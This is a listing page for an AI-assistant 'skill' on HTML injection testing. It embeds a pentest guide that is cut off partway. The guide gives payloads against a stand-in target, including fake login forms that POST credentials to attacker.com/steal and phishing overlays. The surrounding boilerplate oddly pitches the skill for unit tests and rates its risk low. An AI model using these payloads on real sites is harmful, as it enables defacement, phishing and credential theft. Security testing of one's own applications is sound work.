Z
zebbern
@mayurrathi
⭐ 40.7k GitHub stars

Html Injection Testing

Html Injection Testing is an code AI skill with a core value of This skill should be used when the user asks to \"test for HTML injection\", \"inject HTML into web pages\", \"perform HTML injection attacks\", \"deface web applications\", or \"test conten. It helps developers solve real-world problems in the code domain, boosting efficiency, automating repetitive tasks, and optimizing workflows.

This skill should be used when the user asks to \"test for HTML injection\", \"inject HTML into web pages\", \"perform HTML injection attacks\", \"deface web applications\", or \"test conten...

Last verified on: 2026-07-07

Quick Facts

Category code
Works With Claude
Source sickn33/antigravity-awesome-skills
Stars ⭐ 40.7k
Last Verified 2026-07-07
Risk Level Low
mkdir -p ./skills/html-injection-testing && curl -sfL https://raw.githubusercontent.com/sickn33/antigravity-awesome-skills/main/skills/html-injection-testing/SKILL.md -o ./skills/html-injection-testing/SKILL.md

Run in terminal / PowerShell. Requires curl (Unix) or PowerShell 5+ (Windows).

Skill Content

# HTML Injection Testing


Purpose


Identify and exploit HTML injection vulnerabilities that allow attackers to inject malicious HTML content into web applications. This vulnerability enables attackers to modify page appearance, create phishing pages, and steal user credentials through injected forms.


Prerequisites


Required Tools

- Web browser with developer tools

- Burp Suite or OWASP ZAP

- Tamper Data or similar proxy

- cURL for testing payloads


Required Knowledge

- HTML fundamentals

- HTTP request/response structure

- Web application input handling

- Difference between HTML injection and XSS


Outputs and Deliverables


1. **Vulnerability Report** - Identified injection points

2. **Exploitation Proof** - Demonstrated content manipulation

3. **Impact Assessment** - Potential phishing and defacement risks

4. **Remediation Guidance** - Input validation recommendations


Core Workflow


Phase 1: Understanding HTML Injection


HTML injection occurs when user input is reflected in web pages without proper sanitization:


html
<!-- Vulnerable code example -->
<div>
    Welcome, <?php echo $_GET['name']; ?>
</div>

<!-- Attack input -->
?name=<h1>Injected Content</h1>

<!-- Rendered output -->
<div>
    Welcome, <h1>Injected Content</h1>
</div>

Key differences from XSS:

- HTML injection: Only HTML tags are rendered

- XSS: JavaScript code is executed

- HTML injection is often stepping stone to XSS


Attack goals:

- Modify website appearance (defacement)

- Create fake login forms (phishing)

- Inject malicious links

- Display misleading content


Phase 2: Identifying Injection Points


Map application for potential injection surfaces:


text
1. Search bars and search results
2. Comment sections
3. User profile fields
4. Contact forms and feedback
5. Registration forms
6. URL parameters reflected on page
7. Error messages
8. Page titles and headers
9. Hidden form fields
10. Cookie values reflected on page

Common vulnerable parameters:

text
?name=
?user=
?search=
?query=
?message=
?title=
?content=
?redirect=
?url=
?page=

Phase 3: Basic HTML Injection Testing


Test with simple HTML tags:


html
<!-- Basic text formatting -->
<h1>Test Injection</h1>
<b>Bold Text</b>
<i>Italic Text</i>
<u>Underlined Text</u>
<font color="red">Red Text</font>

<!-- Structural elements -->
<div style="background:red;color:white;padding:10px">Injected DIV</div>
<p>Injected paragraph</p>
<br><br><br>Line breaks

<!-- Links -->
<a href="http://attacker.com">Click Here</a>
<a href="http://attacker.com">Legitimate Link</a>

<!-- Images -->
<img src="http://attacker.com/image.png">
<img src="x" onerror="alert(1)">  <!-- XSS attempt -->

Testing workflow:

bash
# Test basic injection
curl "http://target.com/search?q=<h1>Test</h1>"

# Check if HTML renders in response
curl -s "http://target.com/search?q=<b>Bold</b>" | grep -i "bold"

# Test in URL-encoded form
curl "http://target.com/search?q=%3Ch1%3ETest%3C%2Fh1%3E"

Phase 4: Types of HTML Injection


#### Stored HTML Injection


Payload persists in database:


html
<!-- Profile bio injection -->
Name: John Doe
Bio: <div style="position:absolute;top:0;left:0;width:100%;height:100%;background:white;">
     <h1>Site Under Maintenance</h1>
     <p>Please login at <a href="http://attacker.com/login">portal.company.com</a></p>
     </div>

<!-- Comment injection -->
Great article!
<form action="http://attacker.com/steal" method="POST">
    <input name="username" placeholder="Session expired. Enter username:">
    <input name="password" type="password" placeholder="Password:">
    <input type="submit" value="Login">
</form>

#### Reflected GET Injection


Payload in URL parameters:


html
<!-- URL injection -->
http://target.com/welcome?name=<h1>Welcome%20Admin</h1><form%20action="http://attacker.com/steal">

<!-- Search result injection -->
http://target.com/search?q=<marquee>Your%20account%20has%20been%20compromised</marquee>

#### Reflected POST Injecti

🎯 Best For

  • QA engineers
  • Developers writing unit tests
  • Claude users
  • Software engineers
  • Development teams

💡 Use Cases

  • Generating test cases for edge conditions
  • Writing integration test suites
  • Code quality improvement
  • Best practice enforcement

📖 How to Use This Skill

  1. 1

    Install the Skill

    Copy the install command from the Terminal tab and run it. The SKILL.md file downloads to your local skills directory.

  2. 2

    Load into Your AI Assistant

    Open Claude and reference the skill. Paste the SKILL.md content or use the system prompt tab.

  3. 3

    Apply Html Injection Testing to Your Work

    Open your project in the AI assistant and ask it to apply the skill. Start with a small module to verify the output quality.

  4. 4

    Review and Refine

    Review AI suggestions before committing. Run tests, check for regressions, and iterate on the skill output.

❓ Frequently Asked Questions

Does this generate test mocks?

Many testing skills include mock generation. Check the install command and skill content for details.

Is Html Injection Testing compatible with Cursor and VS Code?

Yes — this skill works with any AI coding assistant including Cursor, VS Code with Copilot, and JetBrains IDEs.

Do I need specific dependencies for Html Injection Testing?

Check the install command and Works With section. Most code skills only require the AI assistant and your codebase.

How do I install Html Injection Testing?

Copy the install command from the Terminal tab and run it. The skill downloads to ./skills/html-injection-testing/SKILL.md, ready to use.

Can I customize this skill for my team?

Absolutely. Edit the SKILL.md file to add team-specific instructions, examples, or workflows.

⚠️ Common Mistakes to Avoid

Not testing edge cases

AI tends to generate happy-path tests. Manually review for boundary conditions.

Skipping validation

Always test AI-generated code changes, even for simple refactors.

Missing dependency updates

Check if the skill requires updated dependencies or new packages.

🔗 Related Skills